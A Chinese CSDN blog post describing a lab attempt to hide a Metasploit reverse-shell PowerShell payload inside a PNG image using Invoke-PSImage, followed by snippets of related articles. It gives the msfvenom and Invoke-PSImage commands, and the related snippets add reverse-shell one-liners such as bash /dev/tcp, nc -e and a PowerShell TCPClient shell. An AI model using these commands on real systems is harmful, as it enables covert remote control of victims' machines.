某公众号之图片反弹shell(标题党)

最新推荐文章于 2024-08-10 07:41:25 发布
最新推荐文章于 2024-08-10 07:41:25 发布
阅读量744 收藏 1
点赞数
分类专栏: 实战 文章标签: ps反弹shell
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ws13129/article/details/94608607
版权

某公众号之图片反弹shell
具体公众号猜吧,哈哈哈哈
原项目地址
https://github.com/peewpw/Invoke-PSImage

攻击机 kali 192.168.5.102

靶机 win10 192.168.0.31

1)生成一个msf ps1脚本
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.5.102 LPORT=443 -f psh-reflection -o test.ps1

在这里插入图片描述
ps(此时发生地震,四川人民丝毫不慌)
在这里插入图片描述

2)利用工具将test.ps1与test.png合成为shell.png。
Import-Module .\Invoke-PSImage.ps1

Invoke-PSImage -Script .\test.ps1 -Image .\test.png -Out .\shell.png
file
在这里插入图片描述
3)利用msf配置监听,双击图片

双击图片,依旧未弹回shell。GG思密达(若有成功的,请告诉我)

file
file
4)看原项目介绍,利用ps加载远程图片,执行其中的payload。
在这里插入图片描述
这边本地加载就好了.执行图中代码,over
在这里插入图片描述
在这里插入图片描述
更多细节请参考
https://www.4hou.com/technology/9472.html

本人原创首发于圈子,无无水印图,既直接copy。

cxk331
关注
专栏目录
[ 隧道技术 ] 反弹shell的集中常见方式(一)nc反弹shell
qq_51577576的博客
08-03 1793
攻击者机器 192.168.3.27 和靶机 192.168.3.29 可以相互的访问,这个时候可以使用正向shell攻击者机器 192.168.3.27 不能直接访问靶机,但是靶机 192.168.3.29 可以访问攻击者的机器,这个时候使用反向shell。...
反弹shell原理与实现
悦分享
08-02 3366
反弹shell(reverse shell),就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器(目标ip:目标机器端口),这是比较常规的形式,我们叫做正向连接。远程桌面、web服务、ssh、telnet等等都是正向连接。...
【信息安全】反弹shell
Nicky_Zheng的博客
12-02 221
1、windows-powershell反弹shell kali作为服务端,windows使用powershell连接kali,并将自己的shell给kali windows端 $client = New-Object System.Net.Sockets.TCPClient('192.168.57.200',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i =$stream.Read($byte
05_靶机Billu_b0x改版:任意文件下载,文件包含,图片shell反弹,内核提权
Hack word
04-12 548
1、本次渗透靶机基于网络上的靶机有改动的地方,参考了一些大佬的文文章很受用也学到了新奇的知识:利用任意文件下载漏洞得到数据库账户,进入phpmyadmin后台得到用户账户,尝试木马写入,无果创建账户进入网站后台,万能密码绕过登录利用文件包含与图片马拿到Webshell与会话shell利用Linux内核版本漏洞提权2、有一处知识点是之前没有见过的:写入php木马建立反弹会话shell
Invoke-PSImage使用教程
最新发布
gitblog_00232的博客
08-10 271
Invoke-PSImage使用教程 Invoke-PSImageEncodes a PowerShell script in the pixels of a PNG file and generates a oneliner to execute项目地址:https://gitcode.com/gh_mirrors/in/Invoke-PSImage 项目介绍 Invoke-PSImage ...
weevely生成木马并反向shell连接msf
小刚的博客
05-13 3924
作者:小刚 一位苦于信息安全的萌新小白帽,记得关注给个赞,谢谢 本实验仅用于信息防御教学,切勿用于它用途 weevely实验环境weevely介绍使用流程1,使用weevely生成php木马文件2,将木马文件上传到被攻击web服务器3,使用weevely连接木马文件4,控制参数5,反向shell连接msf总结 今天使用一下kali系统下的中国菜刀weevely,生成木马文件、混淆木马文件控制Web服务器,并进一步反弹shell给metasploit做进一步控制。 实验环境 VM搭建的虚拟测试环境 1.p.
多种姿势反弹shell
Brucetg的博客
08-20 7145
在渗透过程中,在拿到webshell后,如果目标主机是Linux服务器,一般我们都会选择反弹shell以方便后续操作,在此总结下反弹shell的几种姿势。 0x01. Bash反弹 攻击者主机上执行监听: nc -lvvp port 目标主机上执行: bash -i >& /dev/tcp/x.x.x.x/port 0>&1 简单解释下: bash ...
反弹SHELL&不回显带外&正反向连接&防火墙出入站&文件下载
siu~
08-29 806
反弹SHELL&不回显带外&正反向连接&防火墙出入站&文件下载
python反弹shell_反弹Shell小结
weixin_34979632的博客
01-15 6722
1、NC反弹shell1.1、正向反弹shell服务器nc -lvvp 7777 -e /bin/bash攻击机nc server-ip 77771.2、反向反弹shell攻击机nc -lvvp 7777服务器nc -e /bin/bash Client-ip 77771.3、不带-e反弹:2、 bash反弹shell2.1 bash -i攻击机nc -lvvp 7777服务器bash -i &...
常见的反弹shell的方法以及对反弹shell的解释
热门推荐
qq_45584159的博客
03-04 1万+
文章目录一.什么是反弹shell,以及对反弹shell作用原理的解析:3.反弹shell的本质linux文件描述符重定向输入重定向输出重定向标准输出与标准错误输出重定向文件描述符的复制exec 绑定重定向对反弹shell执行的实例分析:>&、&>常见linux提权 一.什么是反弹shell,以及对反弹shell作用原理的解析: 1.定义 通俗来说,shell就是实现用户命令的接口,通过该接口我们能实现对计算机的控制(root权限), 而反弹shell就是将shell反弹给攻击者
常用的一句话反弹shell总结
橘子女侠
05-20 1万+
目录 常用的一句话反弹shell总结 1. bash直接反弹 2. python一句话反弹shell 3. python脚本反弹shell 4. php一句话反弹shell 5. php脚本反弹shell 6. 使用nc命令获取靶机的反弹shell; 7. 使用Kali自带的脚本文件获取反弹shell 8. 使用msfvenom 获取一句话反弹shell 常用的一句话反弹she...
Shellcode 藏在图片
12-07
最近某安全会议上的某个的PPT,是英文的,内容如题所示是关于shellcode隐藏技术的。
Golang反弹shell(使用邮件获取反弹地址)
09-29
使用邮件地址作为反弹shell的服务器地址,用于windows的反弹shell,可在编译时选择隐藏弹出窗口 This golng reverse shell fetches the address from your latest email subject, and the subject should be like this: 10.1.1.1:1234 This golag file requires go-pop3 lib which you can get it here: https://github.com/taknb2nch/go-pop3.git If you want to hide the window when executing it, compile the program like this: go build -ldflags -H=windowsgui email_reverse_shell-repl.go
[CTF]-反弹shell[2]
Mr.木Mu
05-27 1657
[二]反弹shell的本质开放端口(腾讯云,宝塔面板)什么是反弹shell反弹shell的本质是什么bash -i/dev/tcp/ip/port实例1:实例2:交互重定向>&、&>常见的反弹shell 的语句怎么理解1234结束极客大挑战where_is_my_FUMO 开放端口(腾讯云,宝塔面板) 测试反弹shell 需要保证端口开放 打开腾讯云 --> 打开安全组 --> 添加规则 添加入站规则 完成之后–> 一键放通 然后进入宝塔面板
反弹shell---生成木马反弹shell(Windows)
weixin_50956890的博客
05-04 4260
Windows反弹shell的一种方式--生成木马
反弹shell的N种姿势
记录并分享学习安全的知识点..
09-13 1万+
在渗透测试的过程中,在拿到webshell以后,如果目标主机是Windows主机,则是通过开3389端口在远程连接,如果目标主机是linux服务器,一般我们都会选择反弹shell来进行操作。在这里总结下反弹shell常见的几种姿势。
反弹shell
stonesharp的专栏
04-03 3381
各种反弹shell的方式 - R00tGrok 时间 2014-04-06 23:27:00  博客园精华区原文  http://www.cnblogs.com/r00tgrok/p/reverse_shell_cheatsheet.html [前言:在乌云社区看到反弹shell的几种姿势,考虑到乌云社区不完全对外开放,干脆自己转一下以作分享,另外还收集了点其他的,应该较为全面
Cobalt Strike一些简单免杀 payload
m0_58596609的博客
12-07 757
Cobalt Strike一些简单免杀 payload
深度解析:Linux反弹shell的分类与本质
"不一样的视角剖析Linux 反弹shell水印版.pdf" 本文深入探讨了Linux环境下的反弹shell,从一个新的视角进行分类和解析,旨在揭示更多技术细节。作者指出,传统的反弹shell分类通常只分为交互式和非交互式,但这种...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值